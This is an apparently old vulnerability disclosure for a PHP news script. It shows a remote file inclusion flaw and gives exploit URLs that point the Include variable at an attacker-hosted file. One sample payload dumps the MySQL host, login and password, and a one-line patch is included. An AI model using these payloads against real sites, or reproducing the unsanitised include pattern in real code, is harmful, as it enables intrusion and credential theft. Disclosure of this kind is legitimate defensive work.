Informations :
°°°°°°°°°°°°°°
Language : PHP
Tested version : 1
Problem : bad use of include()

PHP Code :
°°°°°°°°°°
-------Include/variables.php3-------
<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
require("$Include/french.inc");
?>
-----------------------------------

and Include/lib.inc.php3 :
------------------------------------
include("$Include/config.inc.php3");
------------------------------------


Exploits :
°°°°°°°°°°
http://[target]/variables.php3?Include=http://[attacker]
with in the file http://[attacker]/french.inc :
<?
print("<center><u>MySQL Infos</u></center>\n\nServeur: $Mac \nLogin: $Uti 
\nPass: $Mot \nDB Name: $Bd");
?>

and

http://[target]/Include/lib.inc.php3?http://[attacker]
with in a bad php code in the file :
http://[attacker]/config.inc.php3


Patch :
°°°°°°°
Add to the beginning of :
----------------------
Include/lib.inc.php3
Include/variables.php3
----------------------

the line :
$Include="Include";



More details in french :
http://www.frog-man.org/tutos/phpnewsDev.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpnewsDev.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII



frog-m@n








_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! 
http://search.msn.fr/worldwide.asp